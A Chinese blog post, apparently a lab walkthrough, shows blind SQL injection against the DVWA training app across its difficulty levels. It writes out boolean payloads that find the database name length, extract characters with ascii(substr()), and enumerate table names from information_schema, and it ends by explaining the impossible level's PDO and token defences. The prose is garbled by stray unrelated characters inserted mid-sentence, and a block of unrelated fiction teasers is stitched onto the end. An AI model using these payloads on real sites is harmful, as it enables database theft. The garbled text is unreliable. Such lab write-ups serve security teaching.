DVWA SQL盲注全級別

low

先判斷過濾情況庐冯,用1' and 1 = 1 -- - 和 1' and 1=2 -- -可以發(fā)現(xiàn)用單引號將id擴了起來

接著判斷數(shù)據(jù)庫名長度 輸入1' and length(database()) > 3 -- - 沒有問題?

輸入1' and length(database()) > 4-- -有問題 說明當前庫名長度為4

接著就是查詢庫名的第一個字符?1' and ascii(substr(database(),1,1))>88 # 查詢第一個字符的ASCII碼暗挑,后面三位也是這樣查詢骂删。

比如輸入1’ and ascii(substr(database(),1,1))>99 # 出現(xiàn)如下情況:

而輸入1’ and ascii(substr(database(),1,1))>100 # 時輸入如下情況:

則可以判斷當前庫名的第一個字符ASCII值為100,也就是d臭胜。其它的字符查詢只需修改substr()函數(shù)的第二個參數(shù)值為2到4即可。

查詢表明滥玷,字段名背苦,字段值也是如此,不過記得在查詢之前要先查詢出目標的長度

比如查詢表名長度:1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9#

查詢第一個表名的第一個字符:1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103#

其它的查詢也是如此就不再列舉遗契。

medium

跟上一篇文章里說到的中級注入類似辐棒,采用了下拉列表,且使用POST傳參,我們可以使用burpsuit抓包或者hackbar來做漾根,這里我就用hackbar吧

測試如下:

沒有引號泰涂,也沒有其它的過濾,那么接下來的步驟就和上面的低級別做法一樣了辐怕,過逼蒙!

high


用了個單獨的頁面來傳參,此舉是為了避免SqlMap的自動化注入寄疏,但對手動的沒影響是牢,接下來的步驟就和low級別的一毛一樣,過陕截!

impossible

簡單說一下源碼:

impossible.php代碼采用了PDO技術驳棱,劃清了代碼與數(shù)據(jù)的界限,有效防御SQL注入

只有當返回的查詢結果數(shù)量為一個記錄時农曲,才會成功輸出社搅,這樣就有效預防了暴庫

利用is_numeric($id)函數(shù)來判斷輸入的id是否是數(shù)字or數(shù)字字符串,滿足條件才知曉query查詢語句

Anti-CSRF token機制的加入了進一步提高了安全性乳规,session_token是隨機生成的動態(tài)值形葬,每次向服務器請求,客戶端都會攜帶最新從服務端已下發(fā)的session_token值向服務器請求作匹配驗證暮的,相互匹配才會驗證通過笙以。

OK 過!

?著作權歸作者所有,轉載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末冻辩,一起剝皮案震驚了整個濱河市源织,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌微猖,老刑警劉巖,帶你破解...
    沈念sama閱讀 219,039評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件缘屹,死亡現(xiàn)場離奇詭異凛剥,居然都是意外死亡,警方通過查閱死者的電腦和手機轻姿,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,426評論 3 395
  • 文/潘曉璐 我一進店門犁珠,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人互亮,你說我怎么就攤上這事犁享。” “怎么了豹休?”我有些...
    開封第一講書人閱讀 165,417評論 0 356
  • 文/不壞的土叔 我叫張陵炊昆,是天一觀的道長。 經(jīng)常有香客問我,道長凤巨,這世上最難降的妖魔是什么视乐? 我笑而不...
    開封第一講書人閱讀 58,868評論 1 295
  • 正文 為了忘掉前任,我火速辦了婚禮敢茁,結果婚禮上佑淀,老公的妹妹穿的比我還像新娘。我一直安慰自己彰檬,他們只是感情好伸刃,可當我...
    茶點故事閱讀 67,892評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著逢倍,像睡著了一般捧颅。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上瓶堕,一...
    開封第一講書人閱讀 51,692評論 1 305
  • 那天隘道,我揣著相機與錄音,去河邊找鬼郎笆。 笑死谭梗,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的宛蚓。 我是一名探鬼主播激捏,決...
    沈念sama閱讀 40,416評論 3 419
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼凄吏!你這毒婦竟也來了远舅?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,326評論 0 276
  • 序言:老撾萬榮一對情侶失蹤痕钢,失蹤者是張志新(化名)和其女友劉穎图柏,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體任连,經(jīng)...
    沈念sama閱讀 45,782評論 1 316
  • 正文 獨居荒郊野嶺守林人離奇死亡蚤吹,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,957評論 3 337
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了随抠。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片裁着。...
    茶點故事閱讀 40,102評論 1 350
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖拱她,靈堂內(nèi)的尸體忽然破棺而出二驰,到底是詐尸還是另有隱情,我是刑警寧澤秉沼,帶...
    沈念sama閱讀 35,790評論 5 346
  • 正文 年R本政府宣布桶雀,位于F島的核電站矿酵,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏背犯。R本人自食惡果不足惜坏瘩,卻給世界環(huán)境...
    茶點故事閱讀 41,442評論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望漠魏。 院中可真熱鬧倔矾,春花似錦、人聲如沸柱锹。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,996評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽禁熏。三九已至壤巷,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間瞧毙,已是汗流浹背胧华。 一陣腳步聲響...
    開封第一講書人閱讀 33,113評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留宙彪,地道東北人矩动。 一個月前我還...
    沈念sama閱讀 48,332評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像释漆,于是被迫代替她去往敵國和親悲没。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,044評論 2 355

推薦閱讀更多精彩內(nèi)容